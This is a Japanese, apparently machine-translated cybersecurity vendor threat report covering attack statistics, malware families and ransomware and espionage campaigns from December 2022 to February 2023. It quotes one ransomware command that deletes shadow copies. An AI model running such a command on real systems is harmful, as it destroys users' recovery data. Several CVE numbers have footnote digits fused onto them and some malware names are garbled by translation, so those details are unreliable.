はじめに
BlackBerry では、今日の世界では、セキュリティ・リーダーはテクノロジーとその脆弱性だけに焦点を当てるのではなく、その対象を拡大する必要があると認識しています。効果的なリスク管理を行うためには、セキュリティ・リーダーはグローバルな脅威の状況を継続的に分析し、ビジネス上の意思決定が組織の脅威プロファイルにどのような影響を与えるかを理解する必要があります。同様に、ビジネス・リーダーも、セキュリティ態勢、リスク・エクスポージャー、サイバー防御戦略が自社の事業運営にどのような影響を与えるかを認識する必要があります。
BlackBerry Global Threat Intelligence Reportと当社の専門的なCylanceINTELLIGENCE™サブスクリプションサービスを通じて、現代のリーダーはこの重要な情報にタイムリーにアクセスすることができます。当社独自の人工知能(AI)主導の製品や分析機能から得られる遠隔測定に基づき、また他の公的および私的なインテリジェンス・ソースによって補完される形で、当社のグローバルなBlackBerry Threat Research and Intelligenceチームは、攻撃、脅威行為者、キャンペーンに関する実用的なインテリジェンスを提供します。これにより、お客様は十分な情報に基づいた意思決定を行い、迅速かつ効果的な行動を取ることができます。
本レポートの主なハイライトは以下の通り:
- 数字で見る90日間2022年12月から2023年2月にかけて、1分あたり最大12件の攻撃が観測され、新しいマルウェアのサンプルを使用したユニークな攻撃の数は、前回のレポートでは1分あたり1件であったのに対し、今回のレポート期間中は1分あたり1.5件と、50%も急増しました。
- この期間にサイバー攻撃を受けた上位10カ国。米国は依然として最も多くの攻撃を阻止した国である。しかし、脅威の状況は変化しており、現在ではブラジルが2番目に標的とされており、カナダと日本がそれに続いている。シンガポールが初めてトップ10入りした。
- 攻撃回数で最も標的とされた業界 BlackBerry のテレメトリによると、金融、医療サービス、食品・日用品小売業界の顧客は、マルウェアを使用したサイバー攻撃全体の 60% を受けています。
- 最も一般的な武器ドロッパー、ダウンローダー、リモートアクセスツール(RAT)、ランサムウェアが最も頻繁に使用されています。以下はそのプレビューである:この期間中、BlackBerry 、台湾の半導体メーカーに対するWarzone RATを使用した標的型攻撃、Agent TeslaおよびRedLine infostealerを使用したサイバー犯罪グループ、BlackCatランサムウェアの使用拡大が確認されました。
- 業界特有の攻撃ヘルスケア業界は、この期間、非常に多くのサイバー攻撃に直面し、Cylance Endpoint Security は、増加する新しい Emotet サンプルを含め、毎日平均 59 件の新しい悪意のあるサンプルを阻止しました。この90日間で、BlackBerry のテクノロジーで保護された世界中の金融機関は、1日あたり最大34のユニークなマルウェアサンプルを含む231,000以上の攻撃をブロックしました。さらに、本レポートでは、政府機関、製造業、重要インフラストラクチャに対する攻撃を深く掘り下げています。これらの重要なセクターは、スパイ活動や知的財産権キャンペーンに従事する洗練された、時には国家に支援された脅威アクターによって標的とされることがよくあります。しかし、本レポートで明らかにしたように、これらの重要な業界では、犯罪ソフトウェアやコモディティ型マルウェアもしばしば見受けられます。
また、本レポートでは、注目すべき脅威アクターや武器、最も顕著な攻撃、そして最も重要なことですが、この期間に展開されたMITRE ATT&CKおよびMITRE D3FENDマッピングという形での行動可能な防御対策についても取り上げています。最後に、前回のレポートの予測精度の分析と、過去数ヶ月の出来事に基づく洞察に満ちた重要な要点のリストを提供します。
本号に掲載された詳細かつ実用的なデータすべてをご高覧いただければ幸いです。あらためて、執筆者である BlackBerry Threat Research and Intelligence チームの熟練したグローバル研究者に感謝の意を表したいと思います。最先端の研究を生み出す彼らの継続的な努力により、当社 、BlackBerry のデータおよびCylance AI を活用した製品およびサービスを継続的に改善することができます。
イスマエル・バレンズエラ
脅威リサーチ&インテリジェンス担当バイスプレジデントBlackBerry
ツイッターアバウトセキュリティ
BlackBerry サイバーセキュリティ脅威インテリジェンスの著者たち
攻撃の総数とマルウェアのハッシュ数
2022年12月から2023年2月までに、BlackBerry によるCylance®Endpoint Security ソリューションは、157万8733件のマルウェアベースのサイバー攻撃を阻止しました。脅威行為者は、当社のテクノロジーで保護された顧客に対して1日平均約17,738件の悪意のあるサンプルを展開し、1分間に平均約12件の攻撃を行いました。
これらの脅威の中には、以前に確認された脅威とは異なる、200,454個の新しいマルウェアのサンプルが含まれています。これは、1日平均約2,252件、1分あたり約1.5件の新しいサンプルに相当します。これは、前回の報告期間の平均である1分あたり1件のユニークなサンプルから50%増加したことになります。
次のグラフは、Cylance Endpoint Securityソリューションが2022年12月から2023年2月までに防止したサイバー攻撃の動態を示している。12月の最終週である第4週の落ち込みは、年末年始の休暇に起因するものと思われ、第5週の急上昇は、一般的に人々が新年に仕事に復帰する日付に対応している。
攻撃の地理
攻撃回数で最も標的とされた業種
この報告期間中にCylance エンドポイント・セキュリティ・ソリューションが保護した上位3業種は以下の通り:
- 金融機関
- 病院、診療所、医療機器などの医療サービスおよび医療機器
- スーパーマーケット、ドラッグストア、食品を他の企業に販売する企業などを含む食品・日用品小売業
この3つの業界は、BlackBerry のクライアントに対するサイバー攻撃の60%を占めている。
本報告期間中に攻撃に使用されたマルウェアの種類
ウィンドウズ
ドロッパー/ダウンローダー
エモテ
プライベートローダー
スモークローダー
2011年に初めて発見されたSmokeLoaderは、幾度かの変遷を経て、暗号マイナー、ランサムウェア、トロイの木馬、さらには販売時点情報管理(POS)マルウェアまで、あらゆるものを感染したシステムにロードするために使用される著名な脅威であり続けています。このマルウェアの初期のバージョンはSmokeLdrという名前でアンダーグラウンドのフォーラムで販売されていましたが、2014年以降はロシアを拠点とする脅威アクターのみに販売されています。2018年、SmokeLoaderはPROPagateコードインジェクション2手法を使用した最初のマルウェアとなりました。このマルウェアは、大規模な集団フィッシングキャンペーンに関連する悪意のある文書など、幅広い攻撃ベクトルを通じて配布することができます。2022年7月、BlackBerry Threat Research and Intelligenceチームは、SmokeLoaderがAmadey Botの新バージョンを配布しているのを観測しました。この攻撃の間、SmokeLoaderは、一般的なソフトウェアアプリケーション用の「クラックされた」ソフトウェア(別名「クラック」)やキー生成ツール(別名「キーゲン」)に隠されていました。このキャンペーンの背後にいた脅威行為者は、ブラックハットSEO手法3(別名SEOポイズニング)を利用して、マルウェアのサイトが関連する検索エンジンの検索結果の最上位またはその近くに表示されるようにし、クラックされたファイルを探している人々に悪意のある実行ファイルをダウンロードして実行するよう誘導しました。
アンチウイルスソリューションの中には、クラックやキーゲンをブロックするものがあるため、これらのファイルをダウンロードする前に、意図的にセキュリティ製品を無効にしたり、検出アラートを無視してダウンロードを続行したりする人もいます。その結果、広く検出された脅威であっても、被害者がマルウェアのダウンロードと実行を明示的に許可することで、システムに感染する可能性があります。
インフォステア
XLoader(別名Formbook)
アライグマ
レッドライン
リモートアクセスのトロイの木馬とバックドア
ウォーゾーン/アヴェ・マリア
Warzone (aka Ave Maria) RATは、アンダーグラウンドおよびアバウトなフォーラムで販売されています。Warzoneの包括的な機能には、キーロギング、プロセス操作、コマンド実行、パスワードスクレイピング、ウェブカメラアクセス、リバースプロキシ設定、追加ファイルやマルウェアのダウンロードと実行のサポートなどが含まれます。
Warzoneは、月額22.95米ドルから始まる基本的なRATビルダーへの初期サブスクリプションと、より高価格のプレミアムバージョンの2段階の価格設定を提供している。プレミアムバージョンは、初心者の脅威行為者にアピールするように設計されており、ルートキット、隠しプロセス機能、プレミアムダイナミックDNS(DDNS)、カスタマーサポートなどの高度な機能を、3ヶ月のサブスクリプションで約800米ドルで提供しています。
このコモディティ型マルウェアは特定の標的を持たず、さまざまな脅威行為者やサイバーグループによって使用されています。前四半期、Warzoneは台湾の半導体メーカーに特化したキャンペーンで展開され、悪意のある.RARファイルの添付ファイルを通じて配信されました。
ダーククリスタル/DCRat
DarkCrystal(別名DCRat)は2018年に初めてリリースされ、入手可能な最も安価な.NETバックドアの1つで、価格は2カ月ライセンスで約5米ドルから、「ライフタイム」ライセンス(これは通常、脅威グループのライフタイムを意味する)で最大40米ドルとなっている。
埋め込まれたコンフィギュレーション・ファイルは、実行時にどの機能を有効にするかを決定し、これにはスクリーンショット、キーロギング、ウェブ・ブラウザやクリップボードからのクッキーやパスワードの窃取などが含まれますが、これらに限定されるものではありません。ウクライナのコンピュータ緊急対応チーム(CERT-UA)は、ロシアとウクライナの紛争中にウクライナを標的にしたDarkCrystal7を観測した。
テスラ捜査官
非同期RAT
ブラックバスタ
BlackBastaは、ランサムウェア・アズ・ア・サービス(RaaS)として活動する比較的新しいランサムウェア・グループで、2022年4月に初めて発見された。企業データを復号化するために身代金を要求し、データが一般に流出しないようにするために追加料金を強要するという、二重の恐喝手法を採用しています。
BlackBastaは攻撃にQakbot(別名Qbot)やPrintNightmare(CVE-2021-3452712)エクスプロイトなどのツールを使用し、被害者のデータをChaCha20とRSA-4096の組み合わせで暗号化します。BlackBastaの感染チェーンはターゲットによって異なり、他のランサムウェアグループよりも高速にデータを暗号化します。BlackBastaの動作の一部は、以前Contiグループが作成したマルウェアと類似しています。
ブラックキャット
2021年11月に初めて野生化したBlackCatランサムウェアは、Rustプログラミング言語で作成された最初の主要なランサムウェアファミリーでした。(本レポートで詳述されているように、Rustは、すべての主要なオペレーティングシステムをターゲットとするバイナリをクロスコンパイルする柔軟性を提供し、潜在的なターゲットやシステムの範囲を広げています)。このグループは、Emotetボットネットを使用してランサムウェアのペイロードを配信しています。足場が確立された後、Cobalt Strikeビーコンが展開され、脅威行為者がターゲットネットワーク内をより深く移動できるようにします。
BlackCatは設立当初から多発し、多くの著名な被害者を標的とし、二重、さらには三重の恐喝手法を使用しています。2022年のFBI勧告13によると、BlackCatランサムウェアの関連会社は、2つの古い脅威グループと関連している可能性がある:DarkSideとBlackMatterです。BlackCatは2023年2月、アイルランドのマンスター工科大学を攻撃して話題となりました。
macOS/OSX
トロイの木馬/ダウンローダー
アドウェア
アドウェアは単なる迷惑行為とみなされることもあるが、それ以上に有害な場合もある。不要な広告の表示は、ユーザーの行動を監視したり、サーバーと通信したり、追加のデータやコードをダウンロードしたりといった悪意のある行動に依存しています。例えば、UpdateAgent トロイの木馬は、攻撃的なアドウェア AdLoad を展開します。当社は、この報告期間中に、macOSデバイスを使用する顧客の間で多数のAdLoad感染を防止しました。
また、Pirritアドウェアの継続的な使用も確認されました。このマルウェアは、感染したマシン上でスクリプトや追加のMachオブジェクトファイル形式(Mach-O)の実行ファイルをダウンロードし、起動します。
クロスプラットフォームのマルウェア
リナックス
Linuxの人気は高まり続けている。パブリック・クラウド・サービス14の90%までがLinuxで稼働しており、かなりの数の企業がクラウド・サービスへの移行を進めているか、移行を計画している。さらに、Linux はモノのインターネット(IoT)でも一般的に使用されている。Linuxは企業では一般的なデスクトップOSではないため、感染の多くは、ユーザーに感染した添付ファイルを開かせるのではなく、ブルートフォース攻撃やネットワークやサーバーの脆弱性を突くなどの手法に頼っています。このような理由から、Linuxインフラに依存している組織では、サーバーを保護するための包括的な脆弱性管理プログラムが必要となります。
この報告期間中、BlackBerry の遠隔測定により、システムリソースを消費するだけでなく、犯罪者がリモートでシステムにアクセスできるようにするバックドアなど、他のマルウェアの展開を可能にする暗号マイナーを展開しようとする複数の Linux 攻撃が発見されました。
この報告期間には、複数のオペレーティングシステムを標的とするクロスプラットフォーム型のランサムウェアも増加している。例えば、新しいRoyalランサムウェアは、Linuxだけでなく、WindowsやESXiシステムも標的にすることができます。
暗号マイナー
暗号採掘者は、被害者のLinuxシステムリソースを使用して、金銭的利益を得るためにデジタル暗号通貨を採掘し、クリプトジャッキング15として知られている活動である。BlackBerry 研究者は以前、Dota3マルウェア・ファミリー16を使用した攻撃を検出した。このマルウェアは、脆弱なパスワードを使用するSSHサーバーを攻撃し、既知の暗号採掘者XMRig17をインストールする。2021年初頭から活動しているSysrv18暗号採掘ボットネットは、Goプログラミング言語でコンパイルされており、複数のオペレーティング・システム上で実行することができる。Sysrvは.shファイルからローダーをダウンロードしようとすることから、この攻撃がLinuxシステムを狙ったものであることがわかります。このボットネットには複数のエクスプロイトがあり、システムを侵害した後にXMRigを使用して暗号通貨Moneroを採掘します。
最近の攻撃は、GLPI(ヘルプデスクやIT資産の管理に通常使用されるオープンソースのサービス管理ソフトウェア)の脆弱性であるCVE-2022-3591419を悪用したものでした。攻撃者は、PwnKit (CVE-2021-403420)を悪用して権限の昇格を試みました。被害者のエンドポイントでは、XMRigやBillGatesとして知られるDoSツールなど、複数のマルウェアが見つかっています。
業界特有の攻撃
ヘルスケア
トップ・ヘルスケアの脅威
この報告期間中、Cylance Endpoint Security は、5,246 個のユニークなマルウェア・サンプルを検出して阻止し、93,000 件以上の個別攻撃を回避しました。毎日平均で約59の新たな悪意のあるサンプルが特定され、阻止されていることから、この部門は引き続き重大な脅威に直面しています。
2022年、米国保健社会福祉省(HHS)は、医療がEmotetの主な標的であり、Emotetはボットネットで動作するドロッパーと、さまざまな悪意のあるペイロードを配信できる配信メカニズムに進化していると報告した22。Emotetは、ネットワーク内に侵入して横方向に移動するだけでなく、ランサムウェアを含むマルウェアの最初のアクセスポイントを提供することができるため、医療業界にとって重大な脅威となっています。この報告期間中、BlackBerry の遠隔測定では、医療機関を標的とした Emotet の使用が増加していることが示されました。
この他、ヘルスケアの脅威としては、前回の報告期間中に金融業界の脅威として上位にランクされた、初 期アクセス情報窃取プログラム「RedLine」が挙げられます。初期アクセスブローカー23(IAB)やランサムウェアの運営会社の関連会社は、盗んだ認証情報を使用してネットワークを侵害し、ランサムウェアを展開します。米国では、BlackCatやRoyal24をはじめとするランサムウェアの運営者が、ヘルスケア業界を積極的に標的としていました。Mallox25ランサムウェアも確認されている。
前回の報告書では、さまざまな脅威行為者(国家行為者を含む)が、Cobalt StrikeやBrute Ratelのような市販の侵入テストツールを使用し、サイバー犯罪攻撃と合法的なテスト活動の区別を困難にしていることを指摘した。今回の報告期間中、Cobalt Strikeの悪意のある使用は、ヘルスケア業界にとって最大の脅威でした。
財務
この報告期間中、BlackBerry®テクノロジーで保護された世界中の金融機関は、231,510 件のマルウェア攻撃を受け、1 日平均 2,601 件のマルウェア攻撃を受けました。これらの攻撃のうち、3,004件が新しいマルウェアサンプルによるもので、1日平均34件のユニークな攻撃を受けました。BlackCatは、銀行、信用組合、住宅ローン会社などの金融業界の顧客を標的とした最も活発なランサムウェアファミリーでした。
Metasploitは依然として金融業界を標的とする最も一般的なツールの1つであるが、ToddyCat26のような他の武器やグループも観察されるようになっている。この比較的新しい脅威主体は2021年に初めて報告され、通常ヨーロッパとアジア太平洋(APAC)地域を標的としています。今回の報告期間中、ToddyCatは歴史的にAPACとつながりのあるラテンアメリカの国の金融システムを標的に拡大しました。ToddyCat は、パッチが適用されていないMicrosoft®Exchange サーバーを攻撃することが知られており、デスクトップのエコシステム27 用のその他のインプラントも含まれています。
著名な RedLine 情報窃取ツールは、依然として金融機関を標的にするリーダー的存在です。IABスキームの一環として、RedLineは被害者のマシンから機密情報を収集、流出させ、第三者がブラックマーケットで販売します。RedLineの継続的な人気は、そのアクセスのしやすさ、価格設定、成功の歴史の結果です。
政府/公共団体
政府は、サイバー犯罪者にとって魅力的な、特に機密性の高い情報を保有している。その結果、政府はますます巧妙化する脅威に直面しています。脅威の主体は、その戦術、技術、手順(TTP)の多くを一致させており、個々の主体や独自の関連を特定することは困難になっています。
この報告期間中、Cylance エンドポイント・セキュリティ・ソリューションは、政府・公共サービス部門に対する4万件以上の個別攻撃を阻止し、6,318件のユニークなマルウェアサンプルを特定しました(毎日平均約70件のユニークなサンプルを特定)。攻撃には、情報窃取、高度な持続的脅威(APT)を利用したRAT、物理的なアクセスポイントを介した直接的な標的が含まれていました。
この分野では、コモディティ型マルウェアとして使用される情報窃取プログラムによる脅威が最も多かった。RedLine」と「SmokeLoader」は、最も一般的なマルウェアの1つです。この2つのマルウェアは、持続的アクセスのための次段 階のペイロードを配信するインフォスティーラーやダウンローダーとして機能し、一般的に、初 期感染を確立し、関係者に確立されたアクセスを販売するために使用されます。njRATやAllakoreを含むオープンソースの脅威も検出され、これらはいずれもSideCopyの標的型活動28で使用されています。
この報告期間には、ランサムウェアに移行する前の2010年代後半に恐喝キャンペーンで知られたPhorpiexボットネットを含む、感染したUSBデバイスを介して拡散した複数の脅威も含まれていました。太平洋諸島は、UNC419129として追跡されている脅威者によって直接標的にされました。また、グアムとフィリピンの複数のシステムで、リバースシェルとネクストステージのペイロードを起動するUSB感染型マルウェアが確認されています。
製造業
製造業は、以下のような多くの理由から、サイバー犯罪者にとって魅力的な標的である:
- 製造業のサプライチェーンは脆弱な標的である。なぜなら、サプライチェーンのどこかで混乱が生じると、業界全体に波及する可能性があるからだ。
- 多くのメーカーが特許やその他の知的財産を保有しているため、洗練された、さらには国家が後援する脅威行為者からのスパイ活動や窃盗キャンペーンの潜在的な有利な標的となっている。脅威行為者は知的財産を求めて盗まれたデータをスキャンし、貴重な資産は身代金を要求されたり、違法に売却されたりします(直接の競合他社に売却されることもあります)。
- 大企業は多額の金融資産を保有していることが多く、ランサムウェア集団のような金銭的動機に基づく脅威行為者にとって魅力的な存在となっている。
製造業の脅威トップ
この報告期間中、RedLine、Emotet、RaccoonStealer v2(別名RecordBreaker)を含むコモディティ情報窃盗犯が、製造業に対する最も顕著な脅威であった。
当社の遠隔測定により、2022年12月中、台湾の半導体メーカーを標的にジオフェンシングを使用したAve Mariaダウンローダーのスタブが明らかになりました。悪意のあるファイルは.RARアーカイブにバンドルされ、一般的な地域のサードパーティサプライヤと一致するような名前が付けられていました(脅威アクターがよく使用するソーシャルエンジニアリングの手法)。被害者が実行ファイルを解凍して起動すると、Ave Maria RATの配信によって感染の連鎖が始まります。
また、メキシコを中心とした中南米の組織を標的とした情報窃取マルウェア「Mispadu(別名:Ursa)」の最近のサンプルも見つかりました。このマルチステージのマルウェアは、AutoITスクリプト言語を悪用し、主に銀行の認証情報やログインデータを盗むことに重点を置いています。
製造システムでは、リソースを大量に消費する自動化がますます進んでおり、クリプトジャッキングの格好の標的となっている。この報告期間には、XMRigオープンソースのCPU/GPUマイナーのバージョンなど、トロイの木馬化された暗号マイナーが大幅に増加しました。
製造業を取り巻く広範な脅威
製造業の脅威は拡大を続けている。2023年1月初旬、あるセキュリティ研究者が、ある自動車メーカーのウェブ向けワールドワイド・サプライチェーン管理アプリケーションに発見された脆弱性を公表した。この脆弱性が悪用された場合、攻撃者はサプライヤーの詳細情報や社内プロジェクトなどの機密データにアクセスできる可能性があった。研究者は発見をメーカーに報告し、メーカーが欠陥を修正できるようにした。
2023年2月初旬には、米国に拠点を置くネットワーク・ハードウェア・メーカー30が、1月にランサムウェア「Play」グループによる侵入を受けたことを確認した。また、2023年1月には、Viceランサムウェア・グループ(以前は医療や教育を標的とした攻撃を中心に行っていたが、ブラジルの製造業を標的にしていることが判明した31)が侵入した。
エネルギー
エネルギー企業は、複雑な供給ラインとグローバルなサプライヤーを管理し、利用率と埋蔵量の戦略のバランスを取り続ける。この業界は、地政学的な攻撃を計画する国家行為者にとって特に関心の高い業界である。電力管理におけるいかなる混乱も壊滅的な結果をもたらす可能性があるため、エネルギー業界は、システムへのアクセスを試みるソーシャル・エンジニアリングやスピアフィッシングの試みを認識し、回避するためのユーザ・トレーニングを行うなど、攻撃が成功する可能性を排除するために、非常に高いセキュリティ意識を持つ必要があります。
エネルギー業界のエコシステムには、ビジネスITシステム、重要なエネルギーインフラを含む運用技術(OT)、ITとOTの統合および相互接続をサポートする増加する技術が含まれます。2022年、ロシアはウクライナのエネルギー・グリッドを物理的およびデジタル的に標的としました。BlackBerry Threat Research and Intelligenceチームは、同国の電力システムをダウンさせ、混乱させる目的でIndestroyer2マルウェアが導入されたと高い確信を持っています。全体として、ロシアの攻撃は同国の電力インフラのほぼ半分に影響を及ぼし、ウクライナのエネルギー相は、長期化する攻撃は近い将来に止まりそうにないと予測している32。欧州連合(EU)はこれに迅速に対応し33 、エネルギー・インフラのサイバーセキュリティを優先するイニシアチブを推進した。
エネルギーのトップ脅威
この報告期間では、エネルギー産業がEmotetダウンローダーの標的となることが最も多かった。このマルウェア・ファミリーが広く浸透していることから、Emotetによる攻撃は今後も続くと考えられます。当社の遠隔測定では、エネルギー業界に影響を及ぼす RedLine、IcedID、FickerStealer などのコモディティ情報窃取プログラムも確認されました。これらのマルウェアは、MaaSとして比較的低価格で販売されているため、今後もエネルギー産業への攻撃に使用される可能性があります。これらの脅威はブロックに成功し、侵害や被害には至らなかったものの、エネルギー業界に対する攻撃の数が顕著に増加していることを表しています。
米国では、ランサムウェアグループのALPHVが、個人経営の天然ガス・石油生産会社34を標的にし、同社のシステムに侵入してBlackCatランサムウェアを展開した。同社は、この攻撃による混乱は最小限であったと主張していますが、二重の恐喝行為によって400GB以上の流出データが暴露されました。ALPHVはまた、コロンビアのエネルギー供給会社35を標的にし、オンライン・システムのダウンに成功した。
より広範なエネルギー脅威の状況
エネルギー産業のインフラは、産業制御システム(ICS)や監視制御・データ収集(SCADA)装置を含む複雑な OT に依存しており、これらの装置は外部の脅威から保護されなければならない。エネルギー OT の脆弱性は比較的まれであるが、この報告期間には、米国の電力・ガス・インフラに対する巧妙な攻撃があり、これらのシステムが不可解なものではないことを示している。例えば、この期間中、ロシアにリンクしたマルウェア PIPEDREAM が、米国各地の電力・天然ガス・インフラにおけるICS36の侵害を試みました。
物理的なインフラへの脅威に加え、エネルギー産業における事業運営も一般的な標的であり、この注目度の高い業界の組織は、OTとITインフラの両方を保護しなければならない。
注目すべき脅威行為者と武器
APT28/Sofacy
津波/Linuxバックドア
XOR DDoS Linuxマルウェア
プラグエックス
PlugXは、攻撃者が感染したシステムを制御し、機密データの流出やユーザー活動の監視など、さまざまな悪意のある活動を行うことを可能にするRATです。攻撃者は多くの場合、PlugXをキーロガーやランサムウェアなどの他のマルウェアと組み合わせて使用し、感染したシステム上でさまざまな悪意のある活動を行います。PlugXはステルス機能を備えているため、システムの検出や駆除が困難であることが特徴です。このマルウェアは、フィッシングメール、ドライブバイダウンロード(同意なしにプログラムがインストールされる)、ソフトウェアの脆弱性の悪用など、複数の手法で拡散します。マルウェアがシステムに感染すると、リモートのC2サーバーへの接続を確立し、攻撃者が感染したシステムを遠隔操作できるようにします。
PlugXは長年にわたり、APT10、APT17、APT27を含む複数の脅威行為者によって使用されてきました。また、Emissary Panda、Deep Panda、KHRATなどのサイバー犯罪組織もこのマルウェアを使用しています。PlugXは、政府機関、防衛関連企業、ヘルスケア、金融、テクノロジーなどさまざまな分野で活動する企業に対する標的型攻撃で使用されています。
メーター
レッドライン
SEOポイズニング
最も効果的な攻撃
ESXiArgsランサムウェア、パッチ未適用のVMware ESXi Linuxサーバーを全世界でノックアウト
パッチの適用されていないVMware ESXiサーバを標的とした新たなランサムウェアの大規模な発生に関する最初の報告38は、2023年2月初旬にオンラインで始まった。フランスに端を発し39 、急速に世界中に広がったこのランサムウェアは、初日だけで数千台のサーバを暗号化したとする報告もあります。
この新しいランサムウェアの背後にいる脅威者は、インターネットに面したVMware ESXiサーバーの2年前の脆弱性(CVE-2021-2197440)を悪用して侵入し、ランサムウェアを展開しました。この攻撃を受けたESXiのバージョンは以下の通りです:
- ESXi650-202102101-SG以前のESXiバージョン6.5.x
- ESXi670-202102401-SG以前のESXiバージョン6.7.x
- ESXiバージョン7.x以前のESXi70U1c-17325551
このランサムウェアのコンポーネントには、ELFファイル暗号化プログラムと、暗号化プログラムの実行を含む実行チェーンを調整するために設計されたencrypted.shシェルスクリプトが含まれていた。
実行すると、このマルウェアはVMXの設定ファイル名を変更し、実行中のVMXプロセスをすべて終了させ、拡張子が.vmx、.vmxf、.vmsd、.nvram、.vmdkのファイルを特定して暗号化しました。その後、マルウェアはオリジナルを削除しました。
次にこのマルウェアは、2.092716ビットコイン(BTC)という、一見任意とも思える金額を要求する身代金要求書を投下した。そのメモによると、3日以内に支払われなければ、データは公開されるとのことだった。
このベンダーは、2年前の2021年2月にCVE-2021-21974の脆弱性に対するパッチを発行している。この攻撃は、最新のパッチ管理プログラムの重要性を浮き彫りにし、Linuxベースのシステムが攻撃に対して脆弱であり、脅威行為者にとってますます魅力的な標的になっていることを示している。
DarkBitランサムウェア、コマンドラインオプションと最適化された暗号化ルーチンでイスラエルを標的に
2月中旬、テクニオン・イスラエル工科大学はDarkBitと呼ばれる新種のランサムウェアの攻撃を受けた。脅威の主体は地政学的な動機を持っているようで、身代金要求のメモには反政府的、反イスラエル的なメッセージのほか、当時行われていた技術者のレイオフに関する発言も含まれていた。
このランサムウェアはGolangで書かれており、未知の感染ベクターを使用して、暗号化から除外するファイルタイプ、ランサムノート、分割暗号化のために大きなファイルを分割する指示など、マルウェアが従う特定のパラメータを含む埋め込み設定ファイルを展開した。
このマルウェアは、より高速な暗号化ルーチンのためのオプションのマルチスレッド化など、攻撃フローをカスタマイズするためのコマンドラインオプションを使用して実行することもできる。実行されると、マルウェアは以下の呼び出しを実行します:
- "vssadmin.exe delete shadow /all /Quiet"
このコマンドは、シャドウコピーを削除し、復旧作業を妨げ、ホストマシン上の標的となるファイルタイプを特定し、AES-256で暗号化し、拡張子.Darkbitを付加する。
RECOVERY_DARKBIT.txtと題された身代金要求のメモが、被害に遭ったすべてのディレクトリに投下され、身代金の支払い方法が記載されていた。このメモには、48時間以内に身代金が支払われない場合は30%のペナルティが追加され、5日以内に支払われない場合はデータが流出すると記載されていた。
身代金要求の手紙の文言や、脅威行為者のソーシャルメディアやウェブサイト上の同様のコメントから、この攻撃は不満を持つ従業員、従業員のグループ、またはハクティビストの仕業であることが示唆される。
未知の脅威者NewsPenguinがパキスタンを標的に高度なスパイ活動を展開
Blackberry Threat Research and Intelligenceチームは最近、カスタム・フィッシング・ルアーでパキスタンを拠点とする組織を標的にする未知の脅威行為者、NewsPenguinに関する調査結果を発表した。
このルアーは、2023年2月10~12日に開催されるパキスタン国際海事エキスポ&コンファレンスをテーマにしており、コンファレンスの出展者マニュアルを装った兵器化されたWord文書が添付されていました。この文書は、リモートテンプレートインジェクション技術を使用し、悪意のあるマクロを埋め込んで、感染チェーンの次の段階を取得し、最終的に最終的なペイロードであるupdates.exeに導きました。
これまで文書化されていなかったこのスパイ活動ツールには、アンチ解析、アンチサンドボックス、情報窃盗など、さまざまな機能が含まれている:
- ホスト・ハードディスク・ドライブのサイズの確認
- ホストに10GB以上のRAMがあるかどうかの判断
- GetTickCountを使用した稼働時間の特定
- サンドボックスで動作しているか、仮想マシンで動作しているかの判断
インストールされると、マルウェアはチェックインし、12文字の文字列識別子を介してハードコードされたC2サーバーに侵害されたホストを登録します。ホストはその後、攻撃者からの指示を一連の組み込みコマンドとして受け取ることができる。コマンドには以下のようなものがある:
- プロセスおよびホスト情報の特定とリストアップ
- ホスト上のファイルとディレクトリを特定し、コピー、削除、移動、および/または変更する。
- ポータブル実行可能ファイルの実行
- プロセス(自身を含む)の終了
- 被害者のファイルをアップロード(流出)し、追加のマルウェアを含む可能性のあるファイルをダウンロードする。
さらに、このマルウェアは、コマンドを発行する間にちょうど5分間待機する。これは、C2通信に関連するノイズを最小限に抑え、セキュリティや検知メカニズムに検知されないようにするのに役立つ可能性がある。
標的となったイベントはパキスタン海軍が主催し、海洋・軍事技術に焦点を当てたものであったことから、この新たな脅威行為者は、金銭的な目的ではなく、情報窃取やスパイ活動を目的としていた可能性があります。私たちは今後もこのグループの活動を追跡・監視していきます。
ガマレドン、テレグラムでウクライナの組織を標的に
Gamaredon(別名ACTINIUM)は、ウクライナの個人や団体を10年にわたり標的にしてきた、公に帰属する国家支援のロシア系APTグループである。
新年早々、BlackBerry Threat Research and Intelligence チームは、Gamaredonの新たなキャンペーンに関する調査結果を発表した。このキャンペーンでは、同グループが多段階の実行チェーンの一部として、人気の高いメッセージングアプリTelegramを活用していた。Telegramを使用することで、キャンペーンの活動は通常のネットワークトラフィックに紛れ込み、検知されずに残りました。
このキャンペーンの感染経路は、あたかも本物のウクライナの政府機関から発信されたかのように見せかけた、ロシア語やウクライナ語で書かれた兵器化された文書が添付された一連の高度に標的化されたフィッシング・ルアーでした。この文書には、感染したWordファイルを通じてコードの実行を可能にするCVE-2017-019941の悪用などのリモートテンプレートインジェクション技術が採用されていました。悪意のある文書が開かれると、攻撃の次の段階が始まる。
ウクライナのIPアドレスを持つターゲットだけが影響を受けるように、ジオフェンシングが使用された。ターゲットがウクライナにいることが確認されると、新しい悪意のあるIPアドレスにつながるハードコードされたTelegramアカウントに接続するスクリプトがダウンロードされた。各Telegramアカウントは、定期的に新しいIPアドレスを展開し、次の段階のペイロードを提供する新しいURLを構築した。この構造により、グループは、従来のセキュリティ・メカニズムでは検出が困難なまま、インフラを動的に更新することができた。
我々はクリミアで活動するノードを追跡し、少なくとも2022年春から活動していることを突き止めた。
コロンビアの司法、金融、公共、法執行機関を狙うブラインド・イーグル
2023年2月下旬、BlackBerry Threat Research and Intelligenceチームは、南米の脅威グループBlind Eagle(APT-C-3642)に中程度の信頼度で起因するとされる新たなキャンペーンを目撃した。Blind Eagleは2019年から活動を開始し、コロンビア、エクアドル、チリ、スペインの産業を標的にしています。
このキャンペーンの全体的な目標は、AsyncRATコモディティマルウェアを投下し、展開することだった。このグループは、特に税務機関など、さまざまな政府機関になりすます。最初の攻撃は、被害者が信用できるフィッシング・リンクに引っかかり、手の込んだマルチパートの実行チェーンが始まるところから始まることが多い。
Blind Eagleのキャンペーンでは、人気のソーシャルプラットフォームDiscordのコンテンツ配信ネットワークが悪用され、マルウェアがホストされた(Discordの機能は、多くの脅威アクターやサイバー犯罪グループによって武器化されている)。
その他の注目すべき攻撃
黒猫ギャング、アイルランドの大学を標的に
ロックビット
報告期間中、ロックビットは最も活発なRaaSプロバイダーであり、1月だけで、既知のランサムウェア攻撃165件のうち50件がロックビットに起因するものでした44。注目すべき攻撃は以下のとおりです:
- 2022年12月18日、このグループはHospital for Sick Children(通称SickKids)を攻撃した。攻撃から2週間後、ロックビットはメンバーが医療機関を攻撃することでルールを破ったと主張し、謝罪し、無料の復号化ツールを公開した。この2週間の間に、患者の検査や画像診断が遅れ、電話回線が使えなくなり、職員の給与計算システムが停止した。
